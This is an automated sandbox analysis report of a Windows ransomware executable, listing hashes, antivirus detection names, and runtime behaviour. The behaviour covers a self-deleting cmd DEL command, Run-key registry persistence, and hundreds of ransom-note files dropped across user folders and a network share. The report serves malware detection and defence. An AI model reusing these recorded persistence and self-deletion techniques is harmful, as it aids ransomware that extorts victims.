Analysis Date: 2016-02-14 07:06:53
MD5: 9f84cb528e05fada70371fddf0e36cbb
SHA1: 8ce26dbdf8561ff92793f2e20d13f11ed2e35d76

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .koko md5: 85a986fffd7c8fd69e2eea532cc19a3f sha1: 0c6693920a3e22661ba10ffed572257aab438cd5 size: 26624
Section: .okoz md5: 2d4b6afab46fc60fbaa658cc1b1abaa6 sha1: 14f0366b19c04990cc5a4a0172be0cb7d67874b3 size: 122880
Section: .rdata md5: f120dc03ff469c423622a146e01e47a8 sha1: d9ddc4d51645b94fade6b9b85c6093989902e791 size: 51712
Section: .data md5: 8269816a4b4c55bfc437d70132a6a460 sha1: 6dedb47fb341d3422341e76ebc3e03c05af7e5b1 size: 23552
Section: .rsrc md5: 2819aff1bb8a89bf30e60ae159f11590 sha1: 5b74fbc76e99a8c62d988d98473001b183319e0c size: 190464
Timestamp: 2016-02-09 09:29:42
Packer: Microsoft Visual C++ ?.?
PEhash: 3de4c86a46b877d37045ee10d0f0936e13c07836
IMPhash: ee58a88ad6908d3ce187ad220cfd153c
AV CA (E-Trust Ino): Trojan.GenericKDZ.32063
AV Rising: No Virus
AV Mcafee: Ransomware-FDZ!9F84CB528E05
AV Avira (antivir): TR/Crypt.Xpack.446124
AV Twister: No Virus
AV Ad-Aware: Trojan.GenericKDZ.32063
AV Alwil (avast): Win32:Malware-gen
AV Eset (nod32): Win32/Kryptik.ENJR
AV Grisoft (avg): Crypt5.AHLQ
AV Symantec: Trojan.Cryptlock.N!g2
AV Fortinet: W32/Generic.AC.3397790
AV BitDefender: Trojan.GenericKDZ.32063
AV K7: Trojan ( 004dddb11 )
AV Microsoft Security Essentials: Ransom:Win32/Tescrypt.E
AV MicroWorld (escan): Trojan.GenericKDZ.32063
AV MalwareBytes: Trojan.MalPack.PK
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Emsisoft: Trojan.GenericKDZ.32063
AV Frisk (f-prot): W32/Agent.XL.gen!Eldorado
AV Ikarus: Trojan.Win32.Crypt
AV Zillya!: No Virus
AV Kaspersky: Trojan-Ransom.Win32.Bitman.ihw
AV Trend Micro: TROJ_FORUCON.BMC
AV VirusBlokAda (vba32): No Virus
AV CAT (quickheal): Ransom.Crowti.WR7
AV BullGuard: Trojan.GenericKDZ.32063
AV Arcabit (arcavir): Trojan.GenericKDZ.32063
AV ClamAV: No Virus
AV Dr. Web: Trojan.Encoder.3817
AV F-Secure: Trojan.GenericKDZ.32063

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c DEL C:\8CE26D~1.EXE
Creates Process: C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\8CE26D~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe\\x00
Registry: HKEY_CURRENT_USER\Software\D244BEFF994C1AED\data ➝ NULL
Registry: HKEY_CURRENT_USER\Software\xxxsys\ID ➝ NULL
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+qll.txt
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_pdwbpstig.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.png
